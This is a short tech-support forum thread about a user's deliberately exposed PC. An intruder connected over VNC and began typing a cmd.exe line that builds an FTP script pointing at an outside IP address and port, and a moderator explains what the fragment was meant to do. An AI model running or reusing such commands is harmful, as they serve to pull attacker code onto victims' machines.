Tech Support Guy banner
Status
Not open for further replies.
1 - 4 of 4 Posts

·
Registered
216 Posts
Discussion Starter · #1 ·
I was fooling around and opened my PC up to the world. Of course it took little time for a hacker to get in. Hacker opened RUN command and started to type. He got this far:
cmd.exe /c del i&echo open 68.148.228.248 20727 > i&echo user
before I pulled the plug on the network. Can any one tell me where such a command line would take the hacker?

·
Retired Moderator
106,726 Posts
It doesn't look like he got far enough to do anything. OPEN is not a recognized command, so I'm not sure what was being attempted. I think he's trying to start an FTP or Telnet session to the IP address 68.148.228.248 on port 20727 from what I see. The file i was going to be the command file to feed to the application. Open would be valid in that context.

PS: You need a better firewall. :D

·
Registered
216 Posts
Discussion Starter · #3 ·
Thank you for the reply John. Your comments make complete sense in this case.
Actually I had dropped the firewalls, and opened VNC wide open on a PC that really has nothing on it. I was feeling bored and was curious as to how long it would take an unsuspecting individual to get hit here in the Edmonton area. When playing like this and all else fails, Format C: is usually the answer.
Again, I thank you for your input.

·
Retired Moderator
106,726 Posts
You're welcome, and let's practice safe computing out there! :D

You can mark your own threads solved using the thread tools at the upper right of the screen.

1 - 4 of 4 Posts
Status
Not open for further replies.